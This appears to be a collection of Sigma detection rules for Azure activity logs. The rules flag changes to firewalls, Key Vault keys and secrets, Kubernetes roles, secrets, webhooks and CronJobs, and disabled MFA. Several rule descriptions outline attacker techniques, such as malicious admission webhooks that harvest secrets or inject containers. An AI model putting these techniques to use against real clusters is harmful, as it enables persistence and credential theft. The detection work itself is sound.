FILE: rules/cloud/azure/activity_logs/azure_application_deleted.yml
================================================
title: Azure Application Deleted
id: 410d2a41-1e6d-452f-85e5-abdd8257a823
status: test
description: Identifies when a application is deleted in Azure.
references:
- https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy
author: Austin Songer @austinsonger
date: 2021-09-03
modified: 2022-10-09
tags:
- attack.defense-evasion
- attack.impact
- attack.t1489
logsource:
product: azure
service: activitylogs
detection:
selection:
properties.message:
- Delete application
- Hard Delete application
condition: selection
falsepositives:
- Application being deleted may be performed by a system administrator.
- Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Application deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_application_gateway_modified_or_deleted.yml
================================================
title: Azure Application Gateway Modified or Deleted
id: ad87d14e-7599-4633-ba81-aeb60cfe8cd6
status: test
description: Identifies when a application gateway is modified or deleted.
references:
- https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
author: Austin Songer
date: 2021-08-16
modified: 2022-08-23
tags:
- attack.impact
logsource:
product: azure
service: activitylogs
detection:
selection:
operationName:
- MICROSOFT.NETWORK/APPLICATIONGATEWAYS/WRITE
- MICROSOFT.NETWORK/APPLICATIONGATEWAYS/DELETE
condition: selection
falsepositives:
- Application gateway being modified or deleted may be performed by a system administrator.
- Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Application gateway modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_application_security_group_modified_or_deleted.yml
================================================
title: Azure Application Security Group Modified or Deleted
id: 835747f1-9329-40b5-9cc3-97d465754ce6
status: test
description: Identifies when a application security group is modified or deleted.
references:
- https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
author: Austin Songer
date: 2021-08-16
modified: 2022-08-23
tags:
- attack.impact
logsource:
product: azure
service: activitylogs
detection:
selection:
operationName:
- MICROSOFT.NETWORK/APPLICATIONSECURITYGROUPS/WRITE
- MICROSOFT.NETWORK/APPLICATIONSECURITYGROUPS/DELETE
condition: selection
falsepositives:
- Application security group being modified or deleted may be performed by a system administrator.
- Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Application security group modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_container_registry_created_or_deleted.yml
================================================
title: Azure Container Registry Created or Deleted
id: 93e0ef48-37c8-49ed-a02c-038aab23628e
status: test
description: Detects when a Container Registry is created or deleted.
references:
- https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes
- https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/
- https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
- https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1
author: Austin Songer @austinsonger
date: 2021-08-07
modified: 2022-08-23
tags:
- attack.impact
- attack.t1485
- attack.t1496
- attack.t1489
logsource:
product: azure
service: activitylogs
detection:
selection:
operationName:
- MICROSOFT.CONTAINERREGISTRY/REGISTRIES/WRITE
- MICROSOFT.CONTAINERREGISTRY/REGISTRIES/DELETE
condition: selection
falsepositives:
- Container Registry being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Container Registry created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: low
================================================
FILE: rules/cloud/azure/activity_logs/azure_creating_number_of_resources_detection.yml
================================================
title: Number Of Resource Creation Or Deployment Activities
id: d2d901db-7a75-45a1-bc39-0cbf00812192
status: test
description: Number of VM creations or deployment activities occur in Azure via the azureactivity log.
references:
- https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Creating_Anomalous_Number_Of_Resources_detection.yaml
author: sawwinnnaung
date: 2020-05-07
modified: 2023-10-11
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1098
logsource:
product: azure
service: activitylogs
detection:
keywords:
- Microsoft.Compute/virtualMachines/write
- Microsoft.Resources/deployments/write
condition: keywords
falsepositives:
- Valid change
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_device_no_longer_managed_or_compliant.yml
================================================
title: Azure Device No Longer Managed or Compliant
id: 542b9912-c01f-4e3f-89a8-014c48cdca7d
status: test
description: Identifies when a device in azure is no longer managed or compliant
references:
- https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#core-directory
author: Austin Songer @austinsonger
date: 2021-09-03
modified: 2022-10-09
tags:
- attack.impact
logsource:
product: azure
service: activitylogs
detection:
selection:
properties.message:
- Device no longer compliant
- Device no longer managed
condition: selection
falsepositives:
- Administrator may have forgotten to review the device.
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_device_or_configuration_modified_or_deleted.yml
================================================
title: Azure Device or Configuration Modified or Deleted
id: 46530378-f9db-4af9-a9e5-889c177d3881
status: test
description: Identifies when a device or device configuration in azure is modified or deleted.
references:
- https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#core-directory
author: Austin Songer @austinsonger
date: 2021-09-03
modified: 2022-10-09
tags:
- attack.impact
- attack.t1485
- attack.t1565.001
logsource:
product: azure
service: activitylogs
detection:
selection:
properties.message:
- Delete device
- Delete device configuration
- Update device
- Update device configuration
condition: selection
falsepositives:
- Device or device configuration being modified or deleted may be performed by a system administrator.
- Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Device or device configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_dns_zone_modified_or_deleted.yml
================================================
title: Azure DNS Zone Modified or Deleted
id: af6925b0-8826-47f1-9324-337507a0babd
status: test
description: Identifies when DNS zone is modified or deleted.
references:
- https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes
author: Austin Songer @austinsonger
date: 2021-08-08
modified: 2022-08-23
tags:
- attack.impact
- attack.t1565.001
logsource:
product: azure
service: activitylogs
detection:
selection:
operationName|startswith: 'MICROSOFT.NETWORK/DNSZONES'
operationName|endswith:
- '/WRITE'
- '/DELETE'
condition: selection
falsepositives:
- DNS zone modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- DNS zone modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_firewall_modified_or_deleted.yml
================================================
title: Azure Firewall Modified or Deleted
id: 512cf937-ea9b-4332-939c-4c2c94baadcd
status: test
description: Identifies when a firewall is created, modified, or deleted.
references:
- https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
author: Austin Songer @austinsonger
date: 2021-08-08
modified: 2022-08-23
tags:
- attack.impact
- attack.defense-evasion
- attack.t1562.004
logsource:
product: azure
service: activitylogs
detection:
selection:
operationName:
- MICROSOFT.NETWORK/AZUREFIREWALLS/WRITE
- MICROSOFT.NETWORK/AZUREFIREWALLS/DELETE
condition: selection
falsepositives:
- Firewall being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Firewall modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_firewall_rule_collection_modified_or_deleted.yml
================================================
title: Azure Firewall Rule Collection Modified or Deleted
id: 025c9fe7-db72-49f9-af0d-31341dd7dd57
status: test
description: Identifies when Rule Collections (Application, NAT, and Network) is being modified or deleted.
references:
- https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
author: Austin Songer @austinsonger
date: 2021-08-08
modified: 2022-08-23
tags:
- attack.impact
- attack.defense-evasion
- attack.t1562.004
logsource:
product: azure
service: activitylogs
detection:
selection:
operationName:
- MICROSOFT.NETWORK/AZUREFIREWALLS/APPLICATIONRULECOLLECTIONS/WRITE
- MICROSOFT.NETWORK/AZUREFIREWALLS/APPLICATIONRULECOLLECTIONS/DELETE
- MICROSOFT.NETWORK/AZUREFIREWALLS/NATRULECOLLECTIONS/WRITE
- MICROSOFT.NETWORK/AZUREFIREWALLS/NATRULECOLLECTIONS/DELETE
- MICROSOFT.NETWORK/AZUREFIREWALLS/NETWORKRULECOLLECTIONS/WRITE
- MICROSOFT.NETWORK/AZUREFIREWALLS/NETWORKRULECOLLECTIONS/DELETE
condition: selection
falsepositives:
- Rule Collections (Application, NAT, and Network) being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Rule Collections (Application, NAT, and Network) modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_granting_permission_detection.yml
================================================
title: Granting Of Permissions To An Account
id: a622fcd2-4b5a-436a-b8a2-a4171161833c
status: test
description: Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.
references:
- https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Granting_Permissions_To_Account_detection.yaml
author: sawwinnnaung
date: 2020-05-07
modified: 2023-10-11
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1098.003
logsource:
product: azure
service: activitylogs
detection:
keywords:
- Microsoft.Authorization/roleAssignments/write
condition: keywords
falsepositives:
- Valid change
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_keyvault_key_modified_or_deleted.yml
================================================
title: Azure Keyvault Key Modified or Deleted
id: 80eeab92-0979-4152-942d-96749e11df40
status: test
description: Identifies when a Keyvault Key is modified or deleted in Azure.
references:
- https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
author: Austin Songer @austinsonger
date: 2021-08-16
modified: 2022-08-23
tags:
- attack.impact
- attack.credential-access
- attack.t1552
- attack.t1552.001
logsource:
product: azure
service: activitylogs
detection:
selection:
operationName:
- MICROSOFT.KEYVAULT/VAULTS/KEYS/UPDATE/ACTION
- MICROSOFT.KEYVAULT/VAULTS/KEYS/CREATE
- MICROSOFT.KEYVAULT/VAULTS/KEYS/CREATE/ACTION
- MICROSOFT.KEYVAULT/VAULTS/KEYS/IMPORT/ACTION
- MICROSOFT.KEYVAULT/VAULTS/KEYS/RECOVER/ACTION
- MICROSOFT.KEYVAULT/VAULTS/KEYS/RESTORE/ACTION
- MICROSOFT.KEYVAULT/VAULTS/KEYS/DELETE
- MICROSOFT.KEYVAULT/VAULTS/KEYS/BACKUP/ACTION
- MICROSOFT.KEYVAULT/VAULTS/KEYS/PURGE/ACTION
condition: selection
falsepositives:
- Key being modified or deleted may be performed by a system administrator.
- Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Key modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_keyvault_modified_or_deleted.yml
================================================
title: Azure Key Vault Modified or Deleted
id: 459a2970-bb84-4e6a-a32e-ff0fbd99448d
status: test
description: Identifies when a key vault is modified or deleted.
references:
- https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
author: Austin Songer @austinsonger
date: 2021-08-16
modified: 2022-08-23
tags:
- attack.impact
- attack.credential-access
- attack.t1552
- attack.t1552.001
logsource:
product: azure
service: activitylogs
detection:
selection:
operationName:
- MICROSOFT.KEYVAULT/VAULTS/WRITE
- MICROSOFT.KEYVAULT/VAULTS/DELETE
- MICROSOFT.KEYVAULT/VAULTS/DEPLOY/ACTION
- MICROSOFT.KEYVAULT/VAULTS/ACCESSPOLICIES/WRITE
condition: selection
falsepositives:
- Key Vault being modified or deleted may be performed by a system administrator.
- Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Key Vault modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_keyvault_secrets_modified_or_deleted.yml
================================================
title: Azure Keyvault Secrets Modified or Deleted
id: b831353c-1971-477b-abb6-2828edc3bca1
status: test
description: Identifies when secrets are modified or deleted in Azure.
references:
- https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
author: Austin Songer @austinsonger
date: 2021-08-16
modified: 2022-08-23
tags:
- attack.impact
- attack.credential-access
- attack.t1552
- attack.t1552.001
logsource:
product: azure
service: activitylogs
detection:
selection:
operationName:
- MICROSOFT.KEYVAULT/VAULTS/SECRETS/WRITE
- MICROSOFT.KEYVAULT/VAULTS/SECRETS/DELETE
- MICROSOFT.KEYVAULT/VAULTS/SECRETS/BACKUP/ACTION
- MICROSOFT.KEYVAULT/VAULTS/SECRETS/PURGE/ACTION
- MICROSOFT.KEYVAULT/VAULTS/SECRETS/UPDATE/ACTION
- MICROSOFT.KEYVAULT/VAULTS/SECRETS/RECOVER/ACTION
- MICROSOFT.KEYVAULT/VAULTS/SECRETS/RESTORE/ACTION
- MICROSOFT.KEYVAULT/VAULTS/SECRETS/SETSECRET/ACTION
condition: selection
falsepositives:
- Secrets being modified or deleted may be performed by a system administrator.
- Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_kubernetes_admission_controller.yml
================================================
title: Azure Kubernetes Admission Controller
id: a61a3c56-4ce2-4351-a079-88ae4cbd2b58
status: test
description: |
Identifies when an admission controller is executed in Azure Kubernetes.
A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.
The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.
An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.
For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod.
An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.
An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.
references:
- https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes
author: Austin Songer @austinsonger
date: 2021-11-25
modified: 2022-12-18
tags:
- attack.privilege-escalation
- attack.initial-access
- attack.defense-evasion
- attack.persistence
- attack.t1078
- attack.credential-access
- attack.t1552
- attack.t1552.007
logsource:
product: azure
service: activitylogs
detection:
selection:
operationName|startswith:
- 'MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/ADMISSIONREGISTRATION.K8S.IO'
- 'MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/ADMISSIONREGISTRATION.K8S.IO'
operationName|endswith:
- '/MUTATINGWEBHOOKCONFIGURATIONS/WRITE'
- '/VALIDATINGWEBHOOKCONFIGURATIONS/WRITE'
condition: selection
falsepositives:
- Azure Kubernetes Admissions Controller may be done by a system administrator.
- If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_kubernetes_cluster_created_or_deleted.yml
================================================
title: Azure Kubernetes Cluster Created or Deleted
id: 9541f321-7cba-4b43-80fc-fbd1fb922808
status: test
description: Detects when a Azure Kubernetes Cluster is created or deleted.
references:
- https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes
- https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/
- https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
- https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1
author: Austin Songer @austinsonger
date: 2021-08-07
modified: 2022-08-23
tags:
- attack.impact
- attack.t1485
- attack.t1496
- attack.t1489
logsource:
product: azure
service: activitylogs
detection:
selection:
operationName:
- MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/WRITE
- MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/DELETE
condition: selection
falsepositives:
- Kubernetes cluster being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Kubernetes cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: low
================================================
FILE: rules/cloud/azure/activity_logs/azure_kubernetes_cronjob.yml
================================================
title: Azure Kubernetes CronJob
id: 1c71e254-6655-42c1-b2d6-5e4718d7fc0a
status: test
description: |
Identifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.
Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs.
An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
references:
- https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes
- https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/
- https://kubernetes.io/docs/concepts/workloads/controllers/job/
- https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
author: Austin Songer @austinsonger
date: 2021-11-22
modified: 2022-12-18
tags:
- attack.persistence
- attack.t1053.003
- attack.privilege-escalation
- attack.execution
logsource:
product: azure
service: activitylogs
detection:
selection:
operationName|startswith:
- 'MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/BATCH'
- 'MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/BATCH'
operationName|endswith:
- '/CRONJOBS/WRITE'
- '/JOBS/WRITE'
condition: selection
falsepositives:
- Azure Kubernetes CronJob/Job may be done by a system administrator.
- If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_kubernetes_events_deleted.yml
================================================
title: Azure Kubernetes Events Deleted
id: 225d8b09-e714-479c-a0e4-55e6f29adf35
status: test
description: Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.
references:
- https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes
- https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml
author: Austin Songer @austinsonger
date: 2021-07-24
modified: 2022-08-23
tags:
- attack.defense-evasion
- attack.t1562
- attack.t1562.001
logsource:
product: azure
service: activitylogs
detection:
selection:
operationName: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE
condition: selection
falsepositives:
- Event deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Events deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_kubernetes_network_policy_change.yml
================================================
title: Azure Kubernetes Network Policy Change
id: 08d6ac24-c927-4469-b3b7-2e422d6e3c43
status: test
description: Identifies when a Azure Kubernetes network policy is modified or deleted.
references:
- https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes
- https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/
- https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
- https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1
author: Austin Songer @austinsonger
date: 2021-08-07
modified: 2022-08-23
tags:
- attack.impact
- attack.credential-access
- attack.t1485
- attack.t1496
- attack.t1489
logsource:
product: azure
service: activitylogs
detection:
selection:
operationName:
- MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/WRITE
- MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/DELETE
- MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/WRITE
- MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/DELETE
condition: selection
falsepositives:
- Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_kubernetes_pods_deleted.yml
================================================
title: Azure Kubernetes Pods Deleted
id: b02f9591-12c3-4965-986a-88028629b2e1
status: test
description: Identifies the deletion of Azure Kubernetes Pods.
references:
- https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes
- https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml
author: Austin Songer @austinsonger
date: 2021-07-24
modified: 2022-08-23
tags:
- attack.impact
logsource:
product: azure
service: activitylogs
detection:
selection:
operationName: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE
condition: selection
falsepositives:
- Pods may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Pods deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_kubernetes_role_access.yml
================================================
title: Azure Kubernetes Sensitive Role Access
id: 818fee0c-e0ec-4e45-824e-83e4817b0887
status: test
description: Identifies when ClusterRoles/Roles are being modified or deleted.
references:
- https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes
- https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/
- https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
- https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1
author: Austin Songer @austinsonger
date: 2021-08-07
modified: 2022-08-23
tags:
- attack.impact
- attack.t1485
- attack.t1496
- attack.t1489
logsource:
product: azure
service: activitylogs
detection:
selection:
operationName:
- MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/WRITE
- MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/DELETE
- MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/BIND/ACTION
- MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/ESCALATE/ACTION
- MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/WRITE
- MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/DELETE
- MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/BIND/ACTION
- MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/ESCALATE/ACTION
condition: selection
falsepositives:
- ClusterRoles/Roles being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- ClusterRoles/Roles modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_kubernetes_rolebinding_modified_or_deleted.yml
================================================
title: Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted
id: 25cb259b-bbdc-4b87-98b7-90d7c72f8743
status: test
description: Detects the creation or patching of potential malicious RoleBinding/ClusterRoleBinding.
references:
- https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes
- https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/
- https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
- https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1
author: Austin Songer @austinsonger
date: 2021-08-07
modified: 2022-08-23
tags:
- attack.impact
- attack.credential-access
- attack.t1485
- attack.t1496
- attack.t1489
logsource:
product: azure
service: activitylogs
detection:
selection:
operationName:
- MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/WRITE
- MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/DELETE
- MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLEBINDINGS/WRITE
- MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLEBINDINGS/DELETE
condition: selection
falsepositives:
- RoleBinding/ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- RoleBinding/ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_kubernetes_secret_or_config_object_access.yml
================================================
title: Azure Kubernetes Secret or Config Object Access
id: 7ee0b4aa-d8d4-4088-b661-20efdf41a04c
status: test
description: Identifies when a Kubernetes account access a sensitive objects such as configmaps or secrets.
references:
- https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes
- https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/
- https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
- https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1
author: Austin Songer @austinsonger
date: 2021-08-07
modified: 2022-08-23
tags:
- attack.impact
- attack.t1485
- attack.t1496
- attack.t1489
logsource:
product: azure
service: activitylogs
detection:
selection:
operationName:
- MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/CONFIGMAPS/WRITE
- MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/CONFIGMAPS/DELETE
- MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SECRETS/WRITE
- MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SECRETS/DELETE
condition: selection
falsepositives:
- Sensitive objects may be accessed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Sensitive objects accessed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_kubernetes_service_account_modified_or_deleted.yml
================================================
title: Azure Kubernetes Service Account Modified or Deleted
id: 12d027c3-b48c-4d9d-8bb6-a732200034b2
status: test
description: Identifies when a service account is modified or deleted.
references:
- https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes
- https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/
- https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
- https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1
author: Austin Songer @austinsonger
date: 2021-08-07
modified: 2022-08-23
tags:
- attack.impact
- attack.t1531
- attack.t1485
- attack.t1496
- attack.t1489
logsource:
product: azure
service: activitylogs
detection:
selection:
operationName:
- MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/WRITE
- MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/DELETE
- MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/IMPERSONATE/ACTION
condition: selection
falsepositives:
- Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_mfa_disabled.yml
================================================
title: Disabled MFA to Bypass Authentication Mechanisms
id: 7ea78478-a4f9-42a6-9dcd-f861816122bf
status: test
description: Detection for when multi factor authentication has been disabled, which might indicate a malicious activity to bypass authentication mechanisms.
references:
- https://learn.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates
author: '@ionsor'
date: 2022-02-08
tags:
- attack.defense-evasion
- attack.credential-access
- attack.persistence
- attack.t1556
logsource:
product: azure
service: activitylogs
detection:
selection:
eventSource: AzureActiveDirectory
eventName: 'Disable Strong Authentication.'
status: success
condition: selection
falsepositives:
- Authorized modification by administrators
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_network_firewall_policy_modified_or_deleted.yml
================================================
title: Azure Network Firewall Policy Modified or Deleted
id: 83c17918-746e-4bd9-920b-8e098bf88c23
status: test
description: Identifies when a Firewall Policy is Modified or Deleted.
references:
- https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
author: Austin Songer @austinsonger
date: 2021-09-02
modified: 2022-08-23
tags:
- attack.impact
- attack.defense-evasion
- attack.t1562.007
logsource:
product: azure
service: activitylogs
detection:
selection:
operationName:
- MICROSOFT.NETWORK/FIREWALLPOLICIES/WRITE
- MICROSOFT.NETWORK/FIREWALLPOLICIES/JOIN/ACTION
